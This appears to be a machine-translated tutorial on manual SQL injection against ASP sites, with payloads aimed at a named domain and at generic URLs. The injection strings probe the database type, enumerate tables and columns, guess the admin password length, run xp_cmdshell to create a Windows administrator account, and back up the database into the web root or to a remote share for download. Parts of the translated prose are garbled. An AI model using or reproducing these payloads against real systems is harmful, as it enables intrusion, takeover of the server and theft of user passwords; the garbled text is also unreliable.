Research on the vulnerability of manual injection ASP Learning

ACCESS

Querying database types
Http://www.zengke.com/product.asp?sort_id=24 and exists (SELECT * from sysobjects)

The Query Table Admin page returns the normal display as having, the error is none.
Http://www.zengke.com//product.asp?sort_id=24 and exists (SELECT * from admin)

Query the admin table for items admin
/product.asp?sort_id=24 and exists (select Admin_name from admin)

Query Admin table entries Admin content length less than error equals return to normal
Http://www.zengke.com//product.asp?sort_id=24 and (select top 1 len ([pwd]) from (select top 1 * from [admin] Where 1 =1 order BY [PWD]) T-ORDER BY [PWD] desc) <=7

Brute force guess the items in the admin table Admin_name

Sql


①http://site/url.asp?id=1;exec Master. xp_cmdshell "NET user name Password/add"--

semicolon; In SQL Server, the two-and-right statements are represented--the following statements are comments, so this statement is divided into two sentences in SQL Server, first select the Id=1 record, and then execute the stored procedure xp_cmdshell, This stored procedure is used to invoke system commands, so the net command creates a new account for Windows with user name name, password password, and then:

②http://site/url.asp?id=1;exec Master. xp_cmdshell "net localgroup Administrators Name/add"--

Add the new account name to the Administrators group, and you will have the highest privileges in the system without two minutes! Of course, this method only applies if the database is connected with an SA, otherwise there is no permission to invoke xp_cmdshell.

③http://site/url.asp?id=1;; and db_name () >0

There is a similar example and user>0, which is to get the connection user name, Db_name () is another system variable, and returns the database name of the connection.

④http://site/url.asp?id=1;backup database name to disk= ' c:inetpubwwwroot.db ';--

This is quite a trick, from ③ to get the database name, plus some IIS error exposed the absolute path, the database back to the Web directory, and then the entire database with HTTP to complete the download back, all the admin and user password are glance! When you do not know the absolute path, you can also back up to the network address of the method (such as \202.96.xx.xxshare.db), but the success rate is not high.

⑤http://site/url.asp?id=1;; and (Select top 1 name from sysobjects where xtype= ' U ' and status>0) >0

As mentioned earlier, sysobjects is a SQL Server system table that stores all the table names, views, constraints, and other objects, xtype= ' U ' and status>0, the name of the table that the user creates, and the above statement takes the first table name out and compares it to 0. Let the error message expose the table name. Second, the third table name how to get? or leave it to our smart readers to think about it.

⑥http://site/url.asp?id=1;; and (Select top 1 col_name (object_id (' table name '), 1) from sysobjects) >0

After you get the table name from ⑤, use object_id (' table name ') to get the internal id,col_name (table name id,1) of the table name to represent the 1th field name of the table, and replace 1 with 2,3,4 ... you can get the name of the field in the puzzle sheet one by one.